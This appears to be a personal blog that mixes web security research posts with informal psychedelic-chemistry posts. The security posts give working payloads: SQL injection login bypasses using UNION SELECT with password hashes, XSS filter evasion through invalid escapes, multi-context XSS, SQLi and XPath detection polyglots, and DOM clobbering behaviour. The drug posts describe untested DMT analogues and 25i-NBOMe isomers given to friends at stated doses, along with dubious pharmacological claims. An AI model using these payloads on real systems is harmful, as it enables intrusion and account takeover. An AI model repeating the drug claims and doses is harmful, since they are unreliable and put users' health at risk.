List of HTML elements that can overwrite javascript variables via DOM Clobbering

I wanted to find out which HTML elements are able to overwrite javascript variables through DOM Clobbering attacks. For those who don't know, DOM Clobbering is an attack discovered by researcher Mario Heiderich a while ago, presented in his talk "In the DOM, no one will here you scream."

Javascript variables can be overwritten through DOM Clobbering with HTML elements that have the id and name attributes. However I noticed that these attributes sometimes clobber window object properties, and some others clobber document object properties. I thought it would be useful to know specifically which combination of elements and attributes clobber those objects.

These are the results I got:

embed elements:
<embed id="x" name="y" />
window.x
window.y
document.y

form elements:
<form id="x" name="y">
window.x
window.y
document.y

iframe elements:
<iframe id="x" name="y">
window.x
window.y
document.y

image elements:
<image id="x" name="y">
window.x
window.y
document.x
document.y

img elements:
<img id="x" name="y">
window.x
window.y
document.x
document.y

object elements:
<object id="x" name="y">
window.x
window.y
document.x
document.y

elements not clobbered via any attribute:
'body'
'caption'
'col'
'colgroup'
'frame'
'frameset'
'head'
'html'
'tbody'
'td'
'tfoot'
'th'
'thead'
'tr'

All other existing and non-existing elements clobber window properties through the id attribute.

Tool for scanning the Import and Export tables in Windows binaries.

If you find a vulnerability in a DLL or in any Portable Executable file it would be a good idea to locate all the binaries that use that particular vulnerable function so that you can exploit them.

I wrote a tool that searches for a specific string in the Import and Export tables of all the Windows binaries located in a given directory. It is a very practical and convenient way to find which binaries make use of a function you know how to exploit.

The script is written in Python and you can find it here:
https://github.com/tr3w/PElookup.py

Comparing the potency between structural analogues of DMT

The intention of this post is to illustrate how strong are the effects of different variations of the very powerful tryptamine DMT.

DMT is a tryptamine which means that it has the following molecular structure:

The different positions (1, 2, 3, 4, 5, 6, 7, a, b, N) can be saturated with different elements (functional groups) to form structural analogues.

The following 5 structural analogues of DMT were synthesized and given to test-subjects in order to be compared:

  • N,N-DMT
  • 4-MeO-DMT
  • 5-MeO-DMT
  • 6-MeO-DMT
  • 7-MeO-DMT

N,N-DMT

This is the most popular form of DMT, when people talk about DMT they are referring to this type of DMT. This molecule is non-selective which means that it binds to all of the 15 types of serotonin receptors.

Since it activates all 15 receptors it could be assumed that this is the strongest form of DMT. And the reality is that in fact N,N-DMT yields by far the strongest and most intense experience compared to the other DMT analogues.

4-MeO-DMT

This DMT analogue creates a far less intense experience compared to N,N-DMT due to the fact that the MeO saturation in position 4 makes the molecule more selective, thus it doesn't activate all the serotonin receptors; it activates only a few.

The user describes the sensation of being immersed in a dream. This dream-like experience is what distinguishes this variation of DMT. This drug is very similar to psilocin (4-HO-DMT), but the MeO substitute makes it a little bit stronger.

The potency and intensity of this drug turned out to yield the less potent experience among all of the other structural analogues in this case-study.

5-MeO-DMT

Rumor has it that regular DMT is not being sold to the people anymore because it is very powerful and the experience could be dangerous and damaging if the user is not aware and has no comprehension of what he is doing in the trip. This is why 5-MeO-DMT is being sold in the market presented as DMT. I'm sure that users that have been using DMT for a considerable long time noticed that they are not getting the same type of DMT than they used to.

Users report a stronger experience compared to the previous cases-study (4-MeO-DMT). They also claim that their vision is enhanced with everything being more colorful and considerably more detailed.

The experience is described as being way more lucid in contrast to the dream-like sensation of 4-MeO-DMT.

6-MeO-DMT

This turned out to be even more powerful than the two previous case-studies.

As the psychedelic effects of the experience are hard to describe in words, the only thing that can be said is that the experience is more profound and intense that the other selective analogues.

7-MeO-DMT

This molecule resulted in the weakest and mildest experience between all the structural analogues.

Saturation with different functional groups

Instead of using the MeO (methoxy) functional group, there are not too many different groups of elements that can be used to saturate the positions 4, 5, 6 and 7.

An HO (hydroxy) functional group can also be used and it results in a milder experience compared to MeO. In fact, 4-HO-DMT is the molecular structure of the very popular psilocin that can be extracted from psychedelic mushrooms but it can also be synthesized in a lab.

Besides HO, longer amino acid chains can be used, such as EtO (ethoxy). 5-EtO-DMT

Results

Efficacy Structure-Activity Relationships of NBOMes

So I decided to conduct a research study to figure out which methoxy groups in different position isomers of NBOMes produce stronger results. In other words, I wanted to measure the potency and efficacy of different variations of the NBOMes. I thought this research would be fun to do due to the reason that this structure-activity relationship illustration has not been published yet.

For the sake of convenience and practicality the NBOMe derivative used for this experiment is going to be 25i-NBOMe due to its popularity and predominance in the drug market.

As a brief explanation to all the n00bs out there who don't know the group positions of an NBOME I have made the following illustration:

In the N-Benzyl group of the NBOMe there are 5 different group positions: 2, 3, 4, 5 and 6.

Usually all NBOMes have the methoxy group (hence the 'OMe') are saturated in position 6, like so:

I had never found a batch with any of the other group positions saturated so I wanted to see what happened if you saturated any of those other groups and which ones produce stronger effects.

In a quest to determine this question, the following 5 isomers of 25i-NBOMe were mysteriously synthesized and tested by me and a group of friends in a non-controlled environment:

The dosage for each test was of 300 μg. The results of the tests were the following:

Stronger potency means that the substance yields more visuals and more changes in the perception of reality.

It seams that for overall drug production, position 6 is preferred since position 3 results too much and a little unbearable for beginners, but as the user get used to the results position 3 becomes preferred due to its stronger efficacy.

Saturating more than 1 group at once results in very strong and intense effects that only highly advanced users can manage and bear. It does yield a whole other level of unfathomable unearthly experience.

Tool for finding RPO vulnerabilities and CSS Exfiltration Techniques

Gareth Heyes (@garetheheyes) discovered a new type of vulnerability which is extremely lethal because it is still relatively unknown and many developers don't know how to validate input to protect applications.

I find it very strange that this vulnerability was disclosed some years ago and it still remains very unpopular.

You can see Gareth's amazing post about his new find in:
http://www.thespanner.co.uk/2014/03/21/rpo/

I decided to write a tool to find these vulnerabilities quickly, because most scanners do not detect RPOs. Burp's scanner does detect it but only in the Professional and Enterprise versions; the free version does not.

You can find the tool in:
http://github.com/tr3w/RPOwn

Here are some resources to very clever research about RPO exploitation:

https://www.mbsd.jp/Whitepaper/rpo.pdf

https://soroush.me/blog/2015/02/non-root-relative-path-overwrite-rpo-in-iis-and-net-applications/

Since RPO exploitation is mainly done by scriptless attacks, I decided to post some links to amazing resources describing different methods to perform such attacks:

@sirdarckcat's attribute reader:
http://eaea.sirdarckcat.net/cssar/v2/

@kinugawamasato text node reader:
https://mksben.l0.cm/2015/10/css-based-attack-abusing-unicode-range.html

@SecurityMB font ligatures:
https://sekurak.pl/wykradanie-danych-w-swietnym-stylu-czyli-jak-wykorzystac-css-y-do-atakow-na-webaplikacje/

@SecurityMB Data exfiltration in Firefox via single injection point:
https://research.securitum.com/css-data-exfiltration-in-firefox-via-single-injection-point/#:~:text=Firefox%20and%20stylesheet%20processing

Pepe Vila recursive imports technique:
https://gist.github.com/cgvwzq/6260f0f0a47c009c87b4d46ce3808231

@d0nutptr recursive import exfiltration tool:
https://github.com/d0nutptr/sic

Mario Heiderich presentation on scriptless attacks:
https://www.slideshare.net/x00mario/stealing-the-pie

New Tool For Breaking Web Logins

I found out that most of the time, web applications are not being properly tested against SQL injection and many times critical security bugs are left undetected. It is not admissible to miss any security vulnerability during a pen-test because somebody else might find the bug and exploit it.

When probing the security of web logins, the following injections are always used:

' or '1'='1
" or "1"="1

Very often, only these injections are tested and if they fail it is assumed that the login is not vulnerable. However, there is a vast amount of other types of injections that should also be tried to correctly determine if the login is vulnerable or not.

Imagine that the login code resembles to the following:

Query:
$result = "SELECT password FROM users WHERE login='$login'
";

Then on the server-side:
if ($result['password'] == $_POST['password'])  Access_Granted();

Even if the login is vulnerable, traditional ' or 1='1 injections will fail to bypass it: even though the injection works and user data is being returned, the attacker still needs to know the correct password to log-in.

The injection for testing the login should now be:
' AND 0 UNION SELECT 'letmein' as password where '1

Thus the attacker can login with whatever password he chooses.

The process of exploiting these types of login requires a big amount of work and can be time consuming, consider the following vulnerable query:

SELECT * FROM users WHERE username='$_POST["username"]';

The asterisk might return dozens of columns and since the number of columns in the UNION query should match, first the number of columns queried should be found:

Brute-force injection:
admin' AND 0 UNION SELECT 1 AND 'TRUE
admin' AND 0 UNION SELECT 1,1 AND 'TRUE
admin' AND 0 UNION SELECT 1,1,1 AND 'TRUE
admin' AND 0 UNION SELECT 1,1,1,1 AND 'TRUE

admin' AND 0 UNION SELECT 1,1,1,1,1 AND 'TRUE
...
admin' AND 0 UNION SELECT 1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 AND 'TRUE
....

This can be tedious to brute-force manually specially if the query is trying to retrieve a huge number of columns.

Also, very frequently the password is going to be stored as a cryptographic hash in the database, which means that the password provided in the login form must be hashed too in order to be compared with the original; injections like this should be tried as well:

Hashed password injection:
# MD5 hash
admin' AND 0 UNION SELECT 5f4dcc3b5aa765d61d8327deb882cf99 AND 'TRUE
admin' AND 0 UNION SELECT 5f4dcc3b5aa765d61d8327deb882cf99, 5f4dcc3b5aa765d61d8327deb882cf99 AND 'TRUE

admin' AND 0 UNION SELECT 5f4dcc3b5aa765d61d8327deb882cf99, 5f4dcc3b5aa765d61d8327deb882cf99, 5f4dcc3b5aa765d61d8327deb882cf99 AND 'TRUE
admin' AND 0 UNION SELECT 5f4dcc3b5aa765d61d8327deb882cf99... AND 'TRUE

...
# SHA1 hash
admin' AND 0 UNION SELECT 5baa61e4c9b93f3f0682250b6cf8331b7ee68fd8 AND 'TRUE
admin' AND 0 UNION SELECT 5baa61e4c9b93f3f0682250b6cf8331b7ee68fd8, 5baa61e4c9b93f3f0682250b6cf8331b7ee68fd8 AND 'TRUE

admin' AND 0 UNION SELECT 5baa61e4c9b93f3f0682250b6cf8331b7ee68fd8, 5baa61e4c9b93f3f0682250b6cf8331b7ee68fd8, 5baa61e4c9b93f3f0682250b6cf8331b7ee68fd8 AND 'TRUE
....

# SHA-224
admin' AND 0 UNION SELECT d63dc919e201d7bc4c825630d2cf25fdc93d4b2f0d46706d29038d01,d63dc919e201d7bc4c825630d2cf25fdc93d4b2f0d46706d29038d01,... AND 'TRUE
# SHA-256
admin' AND 0 UNION SELECT 5e884898da28047151d0e56f8dc6292773603d0d6aabbdd62a11ef721d1542d8, 5e884898da28047151d0e56f8dc6292773603d0d6aabbdd62a11ef721d1542d8,... AND 'TRUE
# SHA-384
admin' AND 0 UNION SELECT a8b64babd0aca91a59bdbb7761b421d4f2bb38280d3a75ba0f21f2bebc45583d446c598660c94ce680c47d19c30783a7,... AND 'TRUE
# SHA-512
admin' AND 0 UNION SELECT b109f3bbbc244eb82441917ed06d618b9008dd09b3befd1b5e07394c706a8bb980b1d7785e5976ec049b46df5f1326af5a2ea6d103fd07c95385ffab0cacbc86,... AND 'TRUE
# Base 64
admin' AND 0 UNION SELECT cGFzc3dvcmQ=, cGFzc3dvcmQ=, cGFzc3dvcmQ=, cGFzc3dvcmQ=... AND 'TRUE

All of these vectors and many others should be tested to see if the login is in fact not vulnerable. As far as I know, there are no tools that exploit these type of vulnerability so I decided to write my own. So far I have found 3 applications that had this security bug and I don't want to miss it in any future security evaluation.

The tool was written in python and it uses Selenium with the Chrome web driver; make sure to install those to get it running.

In the header of the script there is an array containing all the hashing functions tested against the login. You can add more functions such as nested hashes or other cryptographic functions to extend the scope of the security testing.

You can find logincrack.py HERE.

New SQL injection exploitation methods.

I came to the conclusion that the blind SQL injection attack vectors we use are very old and there is a huge room of improvement to make them much faster and more efficient.

I wrote a paper where I documented these optimized injection vectors and it got accepted to Hackfest Quebec, B-Sides Philly and Hack in Paris (which I missed because I was severely jet-lagged and I feel very ashamed to say so).

For a self-explanatory and condensed version of the paper, you can find the slides of the talk HERE.

If you prefer detailed explanations, you can find the paper in .txt format HERE.

The tools are yet to be released. I need to find a decent python compiler so that the tools can compete fairly with sqlmap.

Greetings.

Bypasses for the most popular WAFs

In Black Hat 2009 I had the honor of personally meeting @sirdarckcat (Eduardo Vela, leader of Google Project Zero) who gave a presentation titled "Our favorite XSS filters and how to attack them". In his presentation he managed to bypass every single popular Web Application Firewall that was in the market at that time and he said it was a piece of cake.

The conclusion of his talk was that all Web Application Firewalls (WAFs) were practically useless at that time.

Now, more than ten years later, I decided to evaluate the security of many popular WAFs to see their evolution and how robust they've become over time. The conclusion is that most of them are still extremely vulnerable to very lethal attacks. They are very easy to bypass so the degree of protection they offer is very low; I broke each WAF in around 1 minute.

I decided to publish the bypasses because it is actually funny how bad these filters are.

The WAFs that I tested are:

  • Amazon Web Services WAF
  • Cisco Secure WAF
  • Cloudflare Web Application Firewall
  • Citrix Netscaler
  • F5 BIG-IP Advanced WAF
  • Fortinet's Fortiweb WAF
  • Akamai Web Application Firewall
  • Sophos Firewall
  • Incapsula Imperva
  • Broadcom
  • Radware

Click on more to see the bypasses:

(more…)

XSS filter evasion through invalid escapes

Most of the time, XSS filters look for specific keywords to detect invocation of dangerous functions or variables. A very common bypass technique is to break these specific character sequences like this:

window['ale'+'rt'](1)
window['alexrt'.replace(/x/,'')](1)

Several years ago I found a nice feature in javascript that allows the attacker to break character sequences in a very easy, quick, straight-forward way. It consists of escaping characters that do not have an escape sequence assigned. For instance, this are valid escapes in javascript:

\' Simple quote
\" Double doble
\ Backslash
\n New line
\r Carriage return
\v Vertical tab
\t Tab
\b Backspace
\f Page forward

Those characters will be escaped to their corresponding values if you add a backslash before them.

If you use a backslash before any other character javascript will simply ignore the backslashes, so the string will be broken while still preserving its meaning:

window['\a\l\ert'](1)
window['\pr\o\m\pt'](1)

I hope this will help to do your hacking simpler and faster.

Modern XPath Exploitation

Now that XML technologies are being widely used in modern web applications, XPath injections are becoming more relevant.

Following the release of XPath 2.0 and XPath 3.1 I wanted to see if I could come up with new attack vectors. Turns out that these new XPath implementation did introduce new threats and new risks that expand the attack surface of XPath vulnerabilities.

I wrote a .txt for your convenience and you can find it here:
http://nzt-48.org/Papers/modern-xpath-exploitation.txt

If you prefer to read the paper in this blog post, click on "more"

A tool was released as a proof of concept and you can find it here:
https://github.com/tr3w/injectX

(more…)

XSS Detection Optimization

I noticed that Gareth Heyes has a sweet one-liner XSS testing polyglot in his twitter profile (@GarethHeyes). I thought it would be fun to see if I could optimize it by making it shorter and more functional.

I managed to shorten the length by 10 bytes and surprisingly enough it also works in one more context. This is the one-liner polyglot:

javascript:/*</title></textarea></style --></xmp></script><svg/onload='//"/**/%0a
onmouseover=alert()//'>


It is 103 bytes long and it works in one more context than Gareth's (his doesn't work in single line comment contexts (//).

I decided to improve it so that it works in every possible context:

<script>xss</script>
<script>a='
xss'</script>
<script>a="
xss"</script>
<script>a="
xss"</script>
<script>//
xss</script>
<script>/*
xss*/</script>
<a href='
xss'></a>
<title>
xss</title>
<textarea>
xss</textarea>
<style>xss</style>
<div>
xss</div>
<div
xss></div>
<div class='
xss'></div>
<div class="
xss"></div>
<div class=
xss></div>
<noscript>
xss</noscript>
<noembed>
xss</noembed>
<!--
xss -->
<xmp>
xss</xmp>
<math>xss</math>
<frameset>
xss</frameset>

The resulting vector is:

javascript:/*</title></textarea></style --></xmp></script></noembed></noscript></math><svg/onload='//"/**/%0aonmouseover=alert()//'>

This means that instead of having to send 21 requests to each parameter when testing an application, you only have to make 1 request. This gets the job done in only 5% of the time.


Can you make it even shorter? Let me know in the comments or through twitter (@tr3w_)

XPath Injection Detection Optimization

As a follow-up to the previous post "SQL Injection Detection Optimization", I wanted to post a testing polyglot which works for testing against XPath injection vulnerabilities:

or 1(:'or"or'"!='!=":)

Numeric context:
or 1(:'or"or'"!='!=":)

Single quotation:
or 1(:'or"or'"!='!=":)

Double quotation:
or 1(:'or"or'"!='!=":)

See if you can come up with one that is shorter.

(: Have a happy day :)

SQL Injection Detection Optimization

In Black Hat 2013, Roberto Salgado (@LightOS) came up with the idea of optimizing the detection phase for SQL injection vulnerabilities.

Usually, to test if a parameter is vulnerable to SQL injection, a maximum of six requests must be performed to find out the context of the injection. It might be between single quotes ('), double quotes (") or with no delimiters at all:

TRUE RESPONSES
-1' or '1'='1
-1" or "1"="1
-1 or 1=0

FALSE RESPONSES
-1' or '1'='0
-1" or "1"="0
-1 or 1=0


This means that if, for instance, there are 100 parameteres in the application, a maximum of 600 requests should be performed in order to test all parameters against SQL injection.

LightOS came up with the idea of detecting vulnerable parameters with just one request by fusing the three testing vectors. This is the multi-context functional polyglot that works in any of the already three mentioned contexts:

-1 OR 1#"or"'OR''='"="'OR''='

Numeric context:
-1 OR 1#"or"'OR''='"="'OR''='

Double quotation:
-1 OR 1#"or"'OR''='"="'OR''='

Single quotation:
-1 OR 1#"or"'OR''='"="'OR''='

You can find his slides in the following link: https://media.blackhat.com/us-13/US-13-Salgado-SQLi-Optimization-and-Obfuscation-Techniques-Slides.pdf

Mirror: https://nzt-48.org/presentations/US-13-Salgado-SQLi-Optimization-and-Obfuscation-Techniques-Slides.pdf

I wanted to see if I could optimize this further by making the vector shorter in length. Surprisingly, I managed to shorten LightOS's vector by 7 bytes (from 29 to 22). Here is the result:

-1 or 1#'or"or'"!='!="

Numeric context:
-1 or 1#'or"or'"!='!="

Single quotation:
-1 or 1#'or"or'"!='!="

Double quotation:
-1 or 1#'or"or'"!='!="

This means that instead of performing 300 requests, only 100 requests are needed; the process has been optimized by making it 300% faster.

See if you can make it even shorter.

Hello world!

The intention of this blog is to contribute with as much research as possible.

The main topics are hacking and chemistry/neuropharmacology.

We're interested in sharing as much new knowledge as possible, it doesn't matter if it is not very complex as long as it is useful.

If you want to share something as well, send an abstract to ruben@nzt-48.org and I'll give you a guest account so you can post your own work as well.

Happy hacking and enjoy your 0xc0ffee.